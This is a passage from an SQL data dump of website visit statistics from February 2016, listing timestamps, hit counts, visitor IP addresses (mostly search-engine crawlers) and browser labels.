,1456597046,4,0,4,0,'66.249.64.27',''),(9516,1456597098,1,1,0,0,'130.193.51.102','other'),(9517,1456597101,1,1,0,0,'141.8.132.44','other'),(9519,1456597102,1,1,0,0,'141.8.132.97','other'),(9520,1456597104,2,2,0,0,'141.8.132.76','other'),(9521,1456597105,2,2,0,0,'5.255.253.62','other'),(9522,1456597106,2,2,0,0,'130.193.50.22','other'),(9524,1456597107,2,2,0,0,'93.158.152.26','other'),(9525,1456597108,2,2,0,0,'130.193.51.81','other'),(9526,1456597110,1,1,0,0,'178.154.189.6','other'),(9527,1456597111,2,2,0,0,'141.8.132.109','other'),(9528,1456597113,1,1,0,0,'5.255.253.100','other'),(9529,1456597116,1,1,0,0,'130.193.51.85','other'),(9531,1456597142,1,0,1,0,'66.249.64.32',''),(9532,1456597153,9,0,9,0,'66.249.64.22',''),(9533,1456597262,1,1,0,0,'62.210.215.100','chrome'),(9534,1456597314,1,1,0,0,'80.91.162.99','other'),(9535,1456598091,1,1,0,0,'91.196.177.69','chrome'),(9536,1456598218,2,0,2,0,'66.249.64.177',''),(9537,1456598238,2,0,2,0,'66.249.64.182',''),(9538,1456598242,1,0,1,0,'66.249.64.27',''),(9539,1456598254,3,0,3,0,'66.249.64.22',''),(9540,1456598351,1,0,1,0,'68.180.229.232',''),(9541,1456598505,1,1,0,0,'66.249.81.208','other'),(9542,1456598716,14,0,14,0,'66.249.64.172',''),(9543,1456598794,1,1,0,0,'207.46.13.28','other'),(9544,1456599331,1,1,0,0,'94.154.233.132','other'),(9545,1456599390,1,0,1,0,'66.249.64.177',''),(9546,1456599423,3,3,0,0,'141.8.184.18','other'),(9548,1456599637,2,2,0,0,'82.193.127.15','other'),(9549,1456599667,1,1,0,0,'178.92.248.85','other'),(9550,1456600091,1,1,0,0,'66.249.89.93','other'),(9551,1456600239,1,0,1,0,'66.249.64.172',''),(9552,1456600298,1,1,0,0,'78.111.190.44','chrome'),(9553,1456600405,1,0,1,0,'66.249.64.182',''),(9554,1456600423,2,0,2,0,'66.249.64.177',''),(9555,1456600514,1,1,0,0,'8.29.198.26','other'),(9556,1456601330,2,0,2,0,'66.249.64.182',''),(9557,1456601459,5,0,5,0,'66.249.64.172',''),(9558,1456601989,1,1,0,0,'141.8.184.18','other'),(9559,1456601990,1,1,0,0,'141.8.183.14','other'),(9560,1456602104,1,1,0,0,'66.249.81.205','other'),(9561,1456602238,1,1,0,0,'66.249.64.182','other'),(9562,1456602676,2,0,2,0,'66.249.64.172',''),(9563,1456602751,1,0,1,0,'66.249.64.177',''),(9564,1456602766,1,1,0,0,'217.69.133.31','other'),(9565,1456602816,1,1,0,0,'180.76.15.151','other'),(9566,1456602876,1,1,0,0,'157.55.39.69','other'),(9567,1456602932,2,0,2,0,'68.180.229.232',''),(9568,1456602975,4,1,3,0,'66.249.64.177',''),(9569,1456603291,14,1,13,0,'66.249.64.172',''),(9570,1456603408,2,0,2,0,'66.249.64.182',''),(9571,1456603492,1,1,0,0,'66.249.93.94','firefox'),(9572,1456603498,1,1,0,0,'91.196.179.69','chrome'),(9573,1456604086,3,3,0,0,'5.255.253.53','other'),(9574,1456604087,1,1,0,0,'141.8.184.18','other'),(9575,1456604088,1,1,0,0,'93.158.152.9','other'),(9576,1456604089,1,1,0,0,'130.193.37.21','other'),(9577,1456604333,8,8,0,0,'82.193.127.15','other'),(9578,1456604603,1,0,1,0,'66.249.64.182',''),(9579,1456604694,3,0,3,0,'66.249.64.177',''),(9580,1456605115,1,0,1,0,'68.180.229.232',''),(9581,1456605281,1,1,0,0,'207.46.13.4','other'),(9582,1456605517,2,2,0,0,'141.8.184.18','other'),(9583,1456605519,1,1,0,0,'141.8.183.14','other'),(9584,1456605636,1,0,1,0,'66.249.64.27',''),(9585,1456605648,3,0,3,0,'66.249.64.177',''),(9586,1456605666,15,0,15,0,'66.249.64.172',''),(9587,1456605705,1,1,0,0,'66.249.81.205','other'),(9588,1456605886,1,1,0,0,'157.55.39.69','other'),(9589,1456606794,3,0,3,0,'66.249.64.177',''),(9590,1456606985,1,1,0,0,'62.210.215.100','chrome'),(9591,1456607224,1,1,0,0,'82.145.209.53','other'),(9592,1456607282,3,0,3,0,'66.249.64.182',''),(9593,1456607416,1,1,0,0,'5.165.246.105','opera'),(9594,1456608404,1,1,0,0,'157.55.39.74','other'),(9595,1456608415,2,2,0,0,'178.154.149.11','other'),(9596,1456608430,2,2,0,0,'93.158.152.9','other'),(9597,1456608892,26,26,0,0,'174.34.135.242','other'),(9598,1456608909,1,0,1,0,'66.249.64.182',''),(9599,1456609283,1,1,0,0,'66.249.81.211','other'),(9600,1456609352,2,0,2,0,'66.249.64.172',''),(9601,1456609482,2,0,2,0,'66.249.64.177',''),(9602,1456609651,1,1,0,0,'217.69.136.207','other'),(9603,1456609951,1,0,1,0,'66.249.64.182',''),(9604,1456610018,3,3,0,0,'178.154.149.11','other'),(9605,1456610019,1,1,0,0,'5.255.253.53','other'),(9606,1456610022,1,1,0,0,'141.8.132.99','other'),(9607,1456610646,2,0,2,0,'66.249.64.177',''),(9608,1456610916,1,0,1,0,'68.180.229.232',''),(9609,1456610990,1,1,0,0,'66.249.89.87','other'),(9610,1456611108,2,0,2,0,'66.249.64.182',''),(9611,1456611166,1,1,0,0,'31.172.191.135','chrome'),(9612,1456611316,1,0,1,0,'66.249.64.172',''),(9613,1456611339,1,1,0,0,'8.29.198.25','other'),(9614,1456611680,7,0,7,0,'66.249.64.177',''),(9615,1456612205,6,6,0,0,'207.46.13.28','other'),(9616,1456612208,12,12,0,0,'207.46.13.4','other'),(9617,1456612225,4,4,0,0,'157.55.39.69','other'),(9618,1456612232,9,9,0,0,'157.55.39.74','other'),(9620,1456612249,1,1,0,0,'141.8.184.11','other'),(9621,1456612250,1,1,0,0,'141.8.142.88','other'),(9623,1456612251,1,1,0,0,'141.8.132.99','other'),(9624,1456612253,1,1,0,0,'141.8.184.22','other'),(9625,1456612254,1,1,0,0,'141.8.132.79','other'),(9627,1456612259,1,1,0,0,'141.8.183.14','other'),(9628,1456612262,1,1,0,0,'130.193.37.27','other'),(9629,1456612263,1,1,0,0,'130.193.37.21','other'),(9630,1456612501,4,0,4,0,'66.249.64.172',''),(9631,1456612737,1,0,1,0,'68.180.229.232',''),(9632,1456612994,3,0,3,0,'66.249.64.182',''),(9633,1456613015,1,1,0,0,'180.76.15.5','other'),(9634,1456613100,1,1,0,0,'66.249.81.205','other'),(9635,1456613303,3,0,3,0,'66.249.64.177',''),(9636,1456614138,4,0,4,0,'66.249.64.172',''),(9637,1456614756,2,2,0,0,'141.8.183.14','other'),(9638,1456614757,4,4,0,0,'93.158.152.9','other'),(9639,1456614758,4,4,0,0,'141.8.132.99','other'),(9640,1456614760,3,3,0,0,'130.193.37.21','other'),(9641,1456614761,3,3,0,0,'178.154.149.11','other'),(9642,1456614762,1,1,0,0,'141.8.184.18','other'),(9643,1456614769,1,1,0,0,'5.255.253.53','other'),(9644,1456614771,1,1,0,0,'5.255.253.100','other'),(9645,1456614876,3,0,3,0,'68.180.229.232',''),(9646,1456614933,152,152,0,0,'82.193.127.15','other'),(9647,1456615175,1,0,1,0,'66.249.64.177',''),(9648,1456615214,1,1,0,0,'66.249.64.177','other'),(9649,1456615311,1,1,0,0,'157.55.39.69','other'),(9650,1456615380,5,5,0,0,'62.210.148.246','other'),(9651,1456615541,4,0,4,0,'66.249.64.172',''),(9652,1456615966,1,1,0,0,'157.55.39.74','other'),(9653,1456616481,1,1,0,0,'66.249.81.211','other'),(9654,1456616680,1,0,1,0,'68.180.229.232',''),(9655,1456616890,2,2,0,0,'141.8.132.99','other'),(9656,1456616891,3,3,0,0,'130.193.37.21','other'),(9657,1456616892,2,2,0,0,'141.8.183.14','other'),(9659,1456616894,2,2,0,0,'5.255.253.100','other'),(9660,1456616896,2,2,0,0,'178.154.149.11','other'),(9662,1456616898,3,3,0,0,'93.158.152.9','other'),(9663,1456616900,1,1,0,0,'141.8.184.18','other'),(9664,1456616901,1,1,0,0,'130.193.51.45','other'),(9665,1456616991,1,1,0,0,'217.69.136.206','other'),(9666,1456617311,2,0,2,0,'66.249.64.177',''),(9667,1456617375,3,0,3,0,'66.249.64.172',''),(9668,1456617720,1,0,1,0,'66.249.64.182',''),(9669,1456618446,1,0,1,0,'66.249.64.177',''),(9670,1456618477,2,1,1,0,'66.249.64.177',''),(9671,1456618489,4,1,3,0,'66.249.64.172',''),(9672,1456618615,3,3,0,0,'141.8.184.18','other'),(9673,1456618617,1,1,0,0,'130.193.37.21','other'),(9674,1456618796,2,0,2,0,'66.249.64.182',''),(9675,1456618986,1,1,0,0,'62.210.215.100','chrome'),(9676,1456619256,2,0,2,0,'68.180.229.232',''),(9677,1456619545,5,5,0,0,'141.8.184.18','other'),(9678,1456619549,2,2,0,0,'93.158.152.9','other'),(9679,1456619557,1,1,0,0,'141.8.183.14','other'),(9680,1456619890,1,0,1,0,'66.249.64.182',''),(9681,1456619980,2,0,2,0,'66.249.64.172',''),(9682,1456620061,2,1,1,0,'66.249.64.182',''),(9683,1456620649,2,0,2,0,'66.249.64.177',''),(9684,1456620767,1,1,0,0,'178.154.149.11','other'),(9685,1456620771,1,1,0,0,'141.8.184.18','other'),(9686,1456621334,2,0,2,0,'66.249.64.182',''),(9687,1456621340,3,0,3,0,'66.249.64.172',''),(9688,1456621504,1,1,0,0,'157.55.39.74','other'),(9689,1456621670,1,1,0,0,'66.249.89.90','other'),(9690,1456621756,1,1,0,0,'66.249.64.177','other'),(9691,1456622154,1,1,0,0,'8.29.198.26','other'),(9692,1456622293,1,1,0,0,'148.251.184.220','other'),(9693,1456622718,1,0,1,0,'66.249.64.182',''),(9694,1456622828,2,0,2,0,'66.249.64.177',''),(9695,1456623418,1,1,0,0,'157.55.39.69','other'),(9696,1456623534,1,1,0,0,'66.249.64.182','other'),(9697,1456623540,1,1,0,0,'130.193.37.27','other'),(9698,1456623544,1,1,0,0,'141.8.184.18','other'),(9699,1456623548,1,1,0,0,'93.158.152.9','other'),(9700,1456623552,1,1,0,0,'130.193.51.45','other'),(9701,1456623627,3,2,1,0,'66.249.64.172',''),(9702,1456623764,2,0,2,0,'66.249.64.177',''),(9703,1456623951,1,1,0,0,'180.76.15.22','other'),(9704,1456624246,6,1,5,0,'66.249.64.172',''),(9705,1456624518,1,1,0,0,'66.249.64.172','other'),(9706,1456625020,1,1,0,0,'66.249.64.32','other'),(9707,1456625152,1,1,0,0,'66.249.64.182','other'),(9708,1456625345,2,2,0,0,'178.154.149.11','other'),(9709,1456625353,1,1,0,0,'141.8.183.14','other'),(9710,1456625357,2,2,0,0,'141.8.184.18','other'),(9711,1456625430,3,3,0,0,'66.249.64.172','other'),(9712,1456625646,1,1,0,0,'62.210.215.100','chrome'),(9713,1456625665,1,1,0,0,'66.249.64.177','other'),(9714,1456626010,1,1,0,0,'157.55.39.74','other'),(9715,1456626436,3,3,0,0,'66.249.64.172','other'),(9716,1456626503,1,1,0,0,'66.249.64.182','other'),(9717,1456626644,1,0,1,0,'68.180.229.232',''),(9718,1456626722,4,4,0,0,'66.249.64.177','other'),(9719,1456626735,3,3,0,0,'5.9.89.170','other'),(9720,1456627184,2,2,0,0,'141.8.184.18','other'),(9721,1456627523,2,0,2,0,'66.249.64.172',''),(9722,1456627534,1,0,1,0,'66.249.64.27',''),(9723,1456627602,5,5,0,0,'66.249.64.172','other'),(9724,1456627628,1,1,0,0,'207.46.13.28','other'),(9725,1456627874,2,1,1,0,'66.249.64.182',''),(9726,1456628002,2,2,0,0,'66.249.64.177','other'),(9727,1456628262,3,3,0,0,'136.243.103.157','other'),(9728,1456628897,7,7,0,0,'141.8.184.18','other'),(9729,1456628978,2,1,1,0,'66.249.64.172',''),(9730,1456629009,2,2,0,0,'66.249.64.182','other'),(9731,1456629183,1,1,0,0,'180.76.15.16','other'),(9732,1456629224,2,1,1,0,'66.249.64.177',''),(9733,1456629316,4,2,2,0,'66.249.64.172',''),(9734,1456629371,2,2,0,0,'178.154.149.11','other'),(9735,1456629484,1,1,0,0,'66.249.64.27','other'),(9736,1456629939,5,5,0,0,'66.249.64.182','other'),(9737,1456629993,4,4,0,0,'66.249.64.172','other'),(9738,1456630007,3,3,0,0,'82.193.127.15','other'),(9739,1456630250,5,5,0,0,'66.249.64.177','other'),(9740,1456630405,2,2,0,0,'66.249.64.22','other'),(9741,1456630689,1,0,1,0,'68.180.229.232',''),(9742,1456630800,25,25,0,0,'178.154.149.11','other'),(9743,1456630803,31,31,0,0,'141.8.184.18','other'),(9744,1456631170,1,1,0,0,'62.210.215.100','chrome'),(9745,1456631201,1,1,0,0,'80.91.162.99','other'),(9746,1456631219,4,4,0,0,'93.158.152.9','other'),(9747,1456631251,11,11,0,0,'141.8.183.14','other'),(9748,1456631261,1,1,0,0,'66.249.64.177','other'),(9749,1456631289,9,9,0,0,'66.249.64.172','other'),(9750,1456631305,5,5,0,0,'91.121.101.78','other'),(9751,1456631702,13,13,0,0,'178.154.149.11','other'),(9752,1456631711,7,7,0,0,'141.8.184.18','other'),(9753,1456631850,1,1,0,0,'66.249.64.182','other'),(9754,1456631949,1,1,0,0,'157.55.39.69','other'),(9755,1456632024,1,1,0,0,'66.249.64.32','other'),(9756,1456632069,4,4,0,0,'82.193.127.15','other'),(9757,1456632149,2,2,0,0,'91.209.51.22','other'),(9758,1456632381,7,5,2,0,'66.249.64.172',''),(9759,1456632387,2,2,0,0,'66.249.64.177','other'),(9760,1456632704,3,3,0,0,'176.104.37.122','other'),(9761,1456632856,2,2,0,0,'66.249.64.22','other'),(9762,1456632951,1,1,0,0,'66.249.89.87','other'),(9763,1456632975,1,1,0,0,'8.29.198.25','other'),(9764,1456633035,1,1,0,0,'207.46.13.28','other'),(9765,1456633600,4,4,0,0,'82.193.127.15','other'),(9766,1456634346,1,1,0,0,'66.249.64.182','other'),(9767,1456634374,2,2,0,0,'66.249.64.172','other'),(9768,1456634490,2,2,0,0,'66.249.64.27','other'),(9769,1456634809,1,0,1,0,'68.180.229.232',''),(9770,1456635252,4,1,3,0,'66.249.64.177',''),(9771,1456635301,2,2,0,0,'66.249.64.22','other'),(9772,1456635469,7,1,6,0,'66.249.64.172',''),(9773,1456635474,1,1,0,0,'217.69.133.228','other'),(9774,1456635651,1,1,0,0,'66.102.9.84','firefox'),(9775,1456635880,1,1,0,0,'66.249.64.182','other'),(9776,1456636250,2,1,1,0,'66.249.64.172',''),(9777,1456636361,1,0,1,0,'66.249.64.177',''),(9778,1456636628,2,0,2,0,'68.180.229.232',''),(9779,1456636721,1,1,0,0,'178.154.189.204','other'),(9780,1456637204,1,1,0,0,'66.249.64.172','other'),(9781,1456637438,1,1,0,0,'176.10.104.243','chrome'),(9782,1456637846,3,3,0,0,'207.46.13.4','other'),(9783,1456637919,1,1,0,0,'82.145.219.77','other'),(9784,1456638084,1,1,0,0,'66.249.64.27','other'),(9785,1456638518,1,1,0,0,'217.69.136.209','other'),(9786,1456638530,1,1,0,0,'66.249.64.22','other'),(9787,1456638594,2,1,1,0,'66.249.64.172',''),(9788,1456638851,2,2,0,0,'66.249.64.177','other'),(9789,1456638881,2,2,0,0,'178.154.149.11','other'),(9790,1456638885,4,4,0,0,'141.8.184.18','other'),(9791,1456638893,1,1,0,0,'141.8.183.14','other'),(9792,1456639137,1,1,0,0,'62.141.50.134','other'),(9793,1456639693,1,0,1,0,'68.180.229.232',''),(9794,1456639802,1,1,0,0,'66.249.64.22','other'),(9795,1456639912,1,1,0,0,'66.249.64.182','other'),(9796,1456640042,1,1,0,0,'41.214.96.204','firefox'),(9797,1456640141,2,2,0,0,'66.249.64.172','other'),(9798,1456640379,1,1,0,0,'178.154.189.204','other'),(9799,1456640397,1,1,0,0,'66.249.64.177','other'),(9800,1456641129,1,0,1,0,'68.180.229.232',''),(9801,1456641167,4,3,1,0,'66.249.64.172',''),(9802,1456641327,2,1,1,0,'66.249.64.177',''),(9803,1456641350,1,1,0,0,'66.249.64.27','other'),(9804,1456641651,2,2,0,0,'212.47.253.128','other'),(9805,1456642060,2,1,1,0,'66.249.64.172',''),(9806,1456642332,1,1,0,0,'62.210.215.100','chrome'),(9807,1456642364,3,3,0,0,'66.249.64.172','other'),(9808,1456642720,2,1,1,0,'66.249.64.182',''),(9809,1456642843,3,3,0,0,'66.249.64.177','other'),(9810,1456643187,1,1,0,0,'141.8.183.14','other'),(9811,1456643191,1,1,0,0,'178.154.149.11','other'),(9812,1456643257,1,1,0,0,'66.249.64.22','other'),(9813,1456643392,1,1,0,0,'5.255.253.89','other'),(9814,1456643393,1,1,0,0,'141.8.132.2','other'),(9815,1456643459,4,4,0,0,'136.243.103.164','other'),(9816,1456643462,2,2,0,0,'66.249.64.27','other'),(9817,1456643607,2,1,1,0,'66.249.64.182',''),(9818,1456643657,2,1,1,0,'66.249.64.172',''),(9819,1456643793,1,1,0,0,'8.29.198.25','other'),(9820,1456643832,2,1,1,0,'66.249.64.182',''),(9821,1456644102,5,5,0,0,'66.249.64.177','other'),(9822,1456644193,1,1,0,0,'66.249.89.93','other'),(9823,1456644213,4,4,0,0,'66.249.64.172','other'),(9824,1456644565,1,0,1,0,'68.180.229.232',''),(9825,1456644685,3,3,0,0,'66.249.64.32','other'),(9826,1456644789,3,2,1,0,'66.249.64.182',''),(9827,1456644828,1,1,0,0,'46.200.201.136','chrome'),(9828,1456644989,1,1,0,0,'91.196.178.135','chrome'),(9829,1456645123,4,4,0,0,'66.249.64.27','other'),(9830,1456645234,3,3,0,0,'66.249.64.182','other'),(9831,1456645355,1,1,0,0,'141.8.184.18','other'),(9832,1456645356,1,1,0,0,'141.8.183.14','other'),(9833,1456645375,2,2,0,0,'66.249.64.22','other'),(9834,1456645495,1,0,1,0,'66.249.64.172',''),(9835,1456645501,4,4,0,0,'66.249.64.177','other'),(9836,1456645516,7,4,3,0,'66.249.64.172',''),(9837,1456645723,1,1,0,0,'66.249.64.32','other'),(9838,1456646136,1,1,0,0,'207.46.13.4','other'),(9839,1456646189,2,2,0,0,'66.249.64.182','other'),(9840,1456646455,3,0,3,0,'66.249.64.177',''),(9841,1456646502,2,0,2,0,'66.249.64.172',''),(9842,1456646644,2,1,1,0,'66.249.64.172',''),(9843,1456646676,3,3,0,0,'66.249.64.32','other'),(9844,1456646692,1,0,1,0,'68.180.229.232',''),(9845,1456646842,3,2,1,0,'66.249.64.177',''),(9846,1456647040,3,3,0,0,'66.249.64.177','other'),(9847,1456647128,4,4,0,0,'66.249.64.182','other'),(9848,1456647218,1,1,0,0,'66.249.83.222','other'),(9849,1456647264,1,1,0,0,'66.249.64.27','other'),(9850,1456647527,4,4,0,0,'66.249.64.22','other'),(9851,1456647618,1,0,1,0,'66.249.64.172',''),(9852,1456647666,2,2,0,0,'66.249.64.32','other'),(9853,1456647942,5,5,0,0,'66.249.64.172','other'),(9854,1456648016,1,0,1,0,'66.249.64.177',''),(9855,1456648249,1,1,0,0,'66.249.64.27','other'),(9856,1456648274,7,7,0,0,'66.249.64.177','other'),(9857,1456648465,2,2,0,0,'66.249.64.22','other'),(9858,1456648661,2,2,0,0,'66.249.64.32','other'),(9859,1456649212,1,0,1,0,'68.180.229.232',''),(9860,1456649216,4,4,0,0,'66.249.64.172','other'),(9861,1456649348,2,2,0,0,'66.249.64.182','other'),(9862,1456649393,1,1,0,0,'66.249.64.177','other'),(9863,1456649479,1,1,0,0,'178.154.149.11','other'),(9864,1456649613,1,1,0,0,'66.249.64.27','other'),(9865,1456649615,1,1,0,0,'207.46.13.28','other'),(9866,1456649739,2,2,0,0,'173.234.159.250','other'),(9867,1456649869,1,1,0,0,'141.8.184.18','other'),(9868,1456650043,1,1,0,0,'66.249.64.22','other'),(9869,1456650082,1,1,0,0,'180.76.15.152','other'),(9870,1456650107,1,1,0,0,'51.254.131.244','other'),(9871,1456650470,1,0,1,0,'68.180.229.232',''),(9872,1456650542,1,1,0,0,'66.249.93.90','firefox'),(9873,1456650556,4,4,0,0,'66.249.64.177','other'),(9874,1456650671,3,3,0,0,'66.249.64.182','other'),(9875,1456650686,2,2,0,0,'66.249.64.172','other'),(9876,1456651601,1,1,0,0,'37.9.122.202','other'),(9877,1456651746,1,1,0,0,'5.255.253.100','other'),(9878,1456651755,3,3,0,0,'66.249.64.182','other'),(9879,1456651842,1,1,0,0,'207.46.13.28','other'),(9880,1456651971,1,1,0,0,'178.154.189.204','other'),(9881,1456652070,1,1,0,0,'157.55.39.69','other'),(9882,1456652281,2,2,0,0,'178.154.149.11','other'),(9884,1456652282,1,1,0,0,'93.158.152.9','other'),(9885,1456652283,2,2,0,0,'141.8.183.14','other'),(9886,1456652284,1,1,0,0,'5.255.253.53','other'),(9887,1456652414,1,1,0,0,'66.249.64.172','other'),(9888,1456653042,1,1,0,0,'82.145.220.102','chrome'),(9889,1456653123,1,1,0,0,'91.196.178.134','chrome'),(9890,1456653677,5,5,0,0,'66.249.64.172','other'),(9891,1456653925,1,0,1,0,'68.180.229.232',''),(9892,1456654094,1,1,0,0,'62.210.215.100','chrome'),(9893,1456654095,2,2,0,0,'66.249.64.22','other'),(9894,1456654162,1,1,0,0,'66.249.64.182','other'),(9895,1456654441,1,1,0,0,'141.8.142.8','other'),(9896,1456654442,2,2,0,0,'141.8.184.18','other'),(9897,1456654444,1,1,0,0,'93.158.152.9','other'),(9899,1456654445,1,1,0,0,'5.255.253.53','other'),(9900,1456654525,6,6,0,0,'66.249.64.177','other'),(9901,1456654632,1,1,0,0,'8.29.198.26','other'),(9902,1456654679,6,6,0,0,'66.249.64.172','other'),(9903,1456654710,1,1,0,0,'66.249.89.87','other'),(9904,1456655043,258,258,0,0,'82.193.127.15','other'),(9905,1456655403,1,0,1,0,'66.249.64.32',''),(9906,1456655503,86,86,0,0,'92.236.71.145','other'),(9907,1456655547,3,2,1,0,'66.249.64.177',''),(9908,1456655821,2,0,2,0,'66.249.64.182',''),(9909,1456655840,3,2,1,0,'66.249.64.172',''),(9910,1456655935,1,1,0,0,'66.249.64.22','other'),(9911,1456655947,42,42,0,0,'82.193.127.15','other'),(9912,1456655976,1,0,1,0,'68.180.229.232',''),(9913,1456656008,1,1,0,0,'178.154.149.11','other'),(9914,1456656009,3,3,0,0,'141.8.184.18','other'),(9915,1456656011,1,1,0,0,'93.158.152.9','other'),(9916,1456656012,1,1,0,0,'141.8.183.14','other'),(9917,1456656254,6,1,5,0,'66.249.64.172',''),(9918,1456656350,2,2,0,0,'66.249.64.172','other'),(9919,1456656676,1,1,0,0,'66.249.64.182','other'),(9920,1456656826,4,4,0,0,'66.249.64.177','other'),(9921,1456656942,1,1,0,0,'157.55.39.69','other'),(9922,1456657404,1,1,0,0,'66.249.64.27','other'),(9923,1456657727,2,1,1,0,'66.249.64.177',''),(9924,1456657796,1,1,0,0,'207.46.13.4','other'),(9925,1456657928,1,1,0,0,'66.249.64.172','other'),(9926,1456658145,1,1,0,0,'5.255.253.53','other'),(9927,1456658339,1,1,0,0,'37.9.122.203','other'),(9928,1456658350,2,0,2,0,'68.180.229.232',''),(9929,1456658506,1,1,0,0,'66.249.64.177','other'),(9930,1456658579,1,1,0,0,'77.37.137.7','opera'),(9931,1456658604,1,1,0,0,'130.193.51.81','other'),(9932,1456658605,1,1,0,0,'141.8.132.109','other'),(9933,1456658606,1,1,0,0,'93.158.152.65','other'),(9934,1456658607,1,1,0,0,'130.193.51.50','other'),(9935,1456658608,1,1,0,0,'141.8.184.18','other'),(9936,1456658611,1,1,0,0,'66.249.64.182','other'),(9937,1456658928,1,0,1,0,'66.249.64.172',''),(9938,1456659596,1,1,0,0,'91.196.178.101','firefox'),(9939,1456659649,1,1,0,0,'157.55.39.69','other'),(9940,1456660406,22,22,0,0,'136.243.103.164','other'),(9941,1456660461,1,1,0,0,'77.123.68.85','chrome'),(9942,1456660639,1,1,0,0,'141.8.184.18','other'),(9944,1456660640,1,1,0,0,'5.255.253.53','other'),(9945,1456660641,1,1,0,0,'93.158.152.9','other'),(9946,1456660642,1,1,0,0,'178.154.149.11','other'),(9947,1456660670,1,1,0,0,'162.247.72.200','chrome'),(9948,1456660795,1,1,0,0,'5.79.68.161','chrome'),(9949,1456661006,2,0,2,0,'66.249.64.177',''),(9950,1456661762,1,1,0,0,'178.92.248.85','firefox'),(9951,1456661862,1,1,0,0,'40.77.167.68','other'),(9952,1456662054,1,1,0,0,'130.193.37.27','other'),(9953,1456662055,1,1,0,0,'141.8.142.8','other'),(9955,1456662056,1,1,0,0,'130.193.37.21','other'),(9956,1456662057,1,1,0,0,'130.193.51.45','other'),(9957,1456662058,1,1,0,0,'141.8.132.2','other'),(9958,1456662129,1,0,1,0,'66.249.64.177',''),(9959,1456662765,1,0,1,0,'66.249.64.182',''),(9960,1456662964,1,1,0,0,'66.249.93.94','chrome'),(9961,1456662965,1,1,0,0,'178.92.170.87','chrome'),(9962,1456662985,1,1,0,0,'66.249.93.90','chrome'),(9963,1456663182,1,1,0,0,'178.92.248.85','firefox'),(9964,1456663811,1,1,0,0,'130.193.51.102','other'),(9965,1456663815,1,1,0,0,'5.255.253.53','other'),(9966,1456663819,1,1,0,0,'141.8.142.88','other'),(9967,1456663823,1,1,0,0,'5.255.253.100','other'),(9968,1456664571,2,1,1,0,'66.249.64.177',''),(9969,1456664687,3,3,0,0,'66.249.64.172','other'),(9970,1456664851,1,1,0,0,'178.92.248.85','firefox'),(9971,1456665000,1,0,1,0,'66.249.64.182',''),(9972,1456665038,2,0,2,0,'68.180.229.232',''),(9973,1456665321,2,2,0,0,'66.249.64.182','other'),(9974,1456665481,1,1,0,0,'8.29.198.25','other'),(9975,1456665625,3,2,1,0,'66.249.64.172',''),(9976,1456665713,1,1,0,0,'141.8.142.88','other'),(9977,1456665717,1,1,0,0,'5.255.253.10','other'),(9978,1456665721,1,1,0,0,'130.193.51.7','other'),(9979,1456665725,1,1,0,0,'130.193.51.81','other'),(9980,1456665919,3,0,3,0,'66.249.64.177',''),(9981,1456666032,1,1,0,0,'66.249.89.93','other'),(9982,1456666457,1,1,0,0,'62.210.215.100','chrome'),(9983,1456666607,1,0,1,0,'68.180.229.232',''),(9984,1456666811,4,0,4,0,'66.249.64.172',''),(9985,1456666822,1,0,1,0,'66.249.64.177',''),(9986,1456666824,1,1,0,0,'66.249.64.22','other'),(9987,1456666864,6,1,5,0,'66.249.64.172',''),(9988,1456667121,1,1,0,0,'66.249.64.27','other'),(9989,1456667408,1,1,0,0,'130.193.51.85','other'),(9990,1456667412,2,2,0,0,'141.8.142.10','other'),(9991,1456667417,1,1,0,0,'93.158.152.9','other'),(9992,1456667424,1,1,0,0,'141.8.132.74','other'),(9993,1456667428,1,1,0,0,'141.8.184.22','other'),(9994,1456667592,1,1,0,0,'66.249.64.172','other'),(9995,1456667670,2,2,0,0,'66.249.64.182','other'),(9996,1456667839,1,1,0,0,'148.251.184.220','msie'),(9997,1456668215,1,1,0,0,'5.255.253.62','other'),(9998,1456668219,1,1,0,0,'130.193.37.21','other'),(9999,1456668266,1,0,1,0,'66.249.64.177',''),(10000,1456668347,2,2,0,0,'40.77.167.68','other'),(10001,1456668527,2,1,1,0,'66.249.64.172',''),(10002,1456668789,1,0,1,0,'68.180.229.232',''),(10003,1456668849,3,3,0,0,'66.249.64.177','other'),(10004,1456668989,1,1,0,0,'217.69.136.206','other'),(10005,1456669259,3,2,1,0,'66.249.64.172',''),(10006,1456669335,2,1,1,0,'66.249.64.182',''),(10007,1456669412,182,182,0,0,'51.254.143.240','other'),(10008,1456669758,2,2,0,0,'66.249.64.177','other'),(10009,1456669811,1,1,0,0,'130.193.51.45','other'),(10010,1456669868,1,1,0,0,'141.8.184.18','other'),(10011,1456669873,1,1,0,0,'130.193.51.102','other'),(10012,1456669877,1,1,0,0,'141.8.184.6','other'),(10013,1456669881,1,1,0,0,'141.8.142.88','other'),(10014,1456669885,1,1,0,0,'141.8.183.14','other'),(10015,1456669889,1,1,0,0,'130.193.51.85','other'),(10016,1456670141,1,1,0,0,'66.249.64.172','other'),(10017,1456670872,2,2,0,0,'40.77.167.68','other'),(10018,1456671328,1,1,0,0,'66.249.64.182','other'),(10019,1456671330,1,0,1,0,'68.180.229.232',''),(10020,1456671565,1,1,0,0,'141.8.184.11','other'),(10021,1456671566,1,1,0,0,'217.69.133.230','other'),(10022,1456671570,1,1,0,0,'130.193.51.85','other'),(10023,1456671574,1,1,0,0,'141.8.184.18','other'),(10024,1456671578,1,1,0,0,'141.8.183.14','other'),(10025,1456671582,1,1,0,0,'130.193.37.21','other'),(10026,1456671938,1,1,0,0,'182.118.20.213','msie'),(10027,1456672310,1,1,0,0,'141.8.132.109','other'),(10028,1456672428,1,1,0,0,'101.226.167.210','chrome'),(10029,1456672461,3,3,0,0,'66.249.64.182','other'),(10030,1456672841,1,0,1,0,'66.249.64.177',''),(10031,1456672885,40,40,0,0,'141.8.184.18','other'),(10032,1456672889,45,45,0,0,'178.154.149.11','other'),(10033,1456672910,1,1,0,0,'182.118.20.251','msie'),(10034,1456673106,31,31,0,0,'141.8.183.14','other'),(10035,1456673137,4,4,0,0,'66.249.64.177','other'),(10036,1456673278,2,2,0,0,'141.8.132.99','other'),(10037,1456673330,1,0,1,0,'66.249.64.172',''),(10038,1456673368,14,14,0,0,'5.255.253.53','other'),(10039,1456673403,28,28,0,0,'93.158.152.9','other'),(10040,1456673473,4,4,0,0,'130.193.37.21','other'),(10041,1456673981,4,4,0,0,'178.154.149.11','other'),(10042,1456673982,4,4,0,0,'141.8.184.18','other'),(10043,1456674071,2,2,0,0,'66.249.64.177','other'),(10044,1456674342,1,0,1,0,'68.180.229.232',''),(10045,1456674556,3,1,2,0,'66.249.64.182',''),(10046,1456674957,1,1,0,0,'66.249.64.32','other'),(10047,1456675435,2,0,2,0,'68